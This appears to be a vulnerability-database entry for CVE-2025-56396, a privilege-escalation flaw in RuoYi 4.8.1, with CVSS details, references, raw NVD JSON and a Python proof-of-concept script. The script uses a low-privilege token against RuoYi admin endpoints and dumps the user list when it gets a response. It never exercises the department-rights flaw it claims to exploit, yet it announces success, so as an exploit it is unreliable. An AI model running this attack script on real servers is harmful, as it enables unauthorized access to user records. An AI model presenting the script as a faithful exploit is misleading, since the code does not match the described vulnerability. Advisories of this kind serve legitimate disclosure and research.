CVE-2025-56396

Description

An issue was discovered in Ruoyi 4.8.1 allowing attackers to gain escalated privileges due to the owning department having higher rights than the active user.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ruoyi:ruoyi:4.8.1:*:*:*:*:*:*:* - VULNERABLE

RuoYi <= 4.8.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-56396 PoC - RuoYi 4.8.1 Privilege Escalation
# Author: Security Researcher
# Target: RuoYi <= 4.8.1

import requests
import json

TARGET_URL = "http://target-ruoyi-server.com"
ATTACKER_TOKEN = "attacker_bearer_token_here"

def privilege_escalation_poc():
    """
    PoC for CVE-2025-56396: RuoYi 4.8.1 Privilege Escalation
    The vulnerability allows attackers to gain escalated privileges due to 
    the owning department having higher rights than the active user.
    """
    
    # Step 1: Attempt to access admin panel with low-privilege user
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # Step 2: Try to list all users (requires admin privileges)
    admin_endpoint = f"{TARGET_URL}/system/user/list"
    response = requests.get(admin_endpoint, headers=headers)
    
    if response.status_code == 200:
        data = response.json()
        if data.get("code") == 200:
            print("[+] Privilege Escalation Successful!")
            print("[+] Retrieved user list:")
            print(json.dumps(data, indent=2))
            return True
    
    print("[-] Privilege Escalation Failed")
    return False

def check_vulnerability():
    """Check if target is vulnerable to CVE-2025-56396"""
    # Check system info endpoint
    info_url = f"{TARGET_URL}/system/user/profile"
    headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"}
    
    response = requests.get(info_url, headers=headers)
    
    if response.status_code == 200:
        profile = response.json()
        dept_id = profile.get("data", {}).get("dept", {}).get("deptId")
        print(f"[*] User belongs to department: {dept_id}")
        
        # Check if department has higher privileges
        dept_info_url = f"{TARGET_URL}/system/dept/{dept_id}"
        dept_response = requests.get(dept_info_url, headers=headers)
        
        if dept_response.status_code == 200:
            print("[!] Potential vulnerability: Department info accessible")
            return True
    
    return False

if __name__ == "__main__":
    print("CVE-2025-56396 RuoYi 4.8.1 Privilege Escalation PoC")
    print("=" * 50)
    check_vulnerability()
    print("\n[*] Attempting privilege escalation...")
    privilege_escalation_poc()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-56396
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-56396
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-56396/
[4] VulDB https://vuldb.com/cve/CVE-2025-56396
[5] https://gist.github.com/Han-tj/22cfd18fa9f116bb886e8e56782f6865
[6] https://gitee.com/y_project/RuoYi/issues/ICJ865

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-56396", "sourceIdentifier": "[email protected]", "published": "2025-11-26T16:15:48.183", "lastModified": "2025-12-04T20:16:19.103", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Ruoyi 4.8.1 allowing attackers to gain escalated privileges due to the owning department having higher rights than the active user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruoyi:ruoyi:4.8.1:*:*:*:*:*:*:*", "matchCriteriaId": "66B50E9E-F41D-4BDA-9079-3A1AC60C83F8"}]}]}], "references": [{"url": "https://gist.github.com/Han-tj/22cfd18fa9f116bb886e8e56782f6865", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gitee.com/y_project/RuoYi/issues/ICJ865", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}